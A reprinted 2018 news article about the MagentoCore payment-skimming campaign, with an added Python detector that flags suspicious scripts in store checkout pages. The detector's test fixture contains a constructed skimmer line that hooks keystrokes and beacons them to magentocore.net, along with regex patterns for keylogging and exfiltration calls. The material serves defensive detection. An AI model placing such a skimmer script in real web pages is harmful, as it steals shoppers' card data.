This article originally appeared in SC Magazine on September 5, 2018.
Over the last six months, a recently discovered, highly prolific payment card-scraping campaign managed to infect more than 7,000 online stores running on the open-source Magento e-commerce software platform.
In an Aug. 30 blog post, Dutch security researcher Willem de Groot reported that the operation involved online payment skimming malware called MagentoCore. Of the 7,339 e-shops found to be impacted, at least 1,450 of them were infected for the entire half-year period the threat has existed.
De Groot further explained that MagentoCore skimmers “gain illicit access to the control panel of an e-commerce site, often with brute force techniques,” then embed JavaScript into the HTML template. The malicious script records keystrokes and “sends everything in real-time to the magentocore.net server, registered in Moscow.”
The malware also inserts a backdoor for periodic downloads, removes competing malware, and changes the passwords of common staff user names.
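One defensive check that follows from that description, added here as an example and not code from the article or the researcher: scan a store's rendered checkout HTML for script tags that load from hosts outside an allowlist, or inline scripts that both hook keystrokes and send data off-page. The sample page, the store's own CDN host and the keyword patterns are constructed for illustration; the only real host is the one named in the article.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page for demonstration: the first script is the store's own,
# the rest imitates the injection pattern described above (keystroke hook + beacon).
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-store.test/static/checkout.js"></script>
<script src="https://magentocore.net/mage/mage.js"></script>
</head><body>
<script>
document.addEventListener('keyup', function(e){ buf += e.key; });
new Image().src = 'https://magentocore.net/c?d=' + encodeURIComponent(buf);
</script>
<script>console.log('harmless inline code');</script>
</body></html>"""

KEYLOG = re.compile(r"\b(keyup|keydown|keypress|oninput)\b", re.I)
EXFIL = re.compile(r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\b|\.src\s*=)", re.I)

class ScriptCollector(HTMLParser):
    """Collects every <script> on the page as (src, inline_body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._body = [], None, None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src, self._body = dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._body is not None:
            self._body.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._body is not None:
            self.scripts.append((self._src, "".join(self._body)))
            self._body = None

def find_suspicious_scripts(html, allowed_hosts):
    """Return (reason, detail) pairs for scripts a store template should not contain."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = (urlparse(src).hostname or "").lower()
            if host not in allowed_hosts:
                findings.append(("external script from unlisted host", host))
        elif KEYLOG.search(body) and EXFIL.search(body):
            findings.append(("inline script hooks keystrokes and sends data", body.strip()[:60]))
    return findings
```

Running `find_suspicious_scripts(SAMPLE_HTML, {"cdn.example-store.test"})` flags the unlisted host and the inline keystroke script while leaving the store's own script and the harmless inline block alone; in practice the allowlist would be the store's real static and payment-provider hosts.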
In the two weeks preceding the researcher’s post, the attackers were infecting websites at a clip of 50 to 60 stores per day, according to de Groot.
“Magento is an open-source platform and for this reason is also a favorite target of bad actors. This latest attack was likely carried out through password guessing and exploited vulnerabilities in Magento servers…” said Devon Merchant, digital security and operations manager at The Media Trust, in emailed comments. “The vulnerabilities might lie in the web application source code, enabling bad actors to manipulate the code and inject rogue script into the HTML template. The script then logs keystrokes and sends them to a command-and-control server.”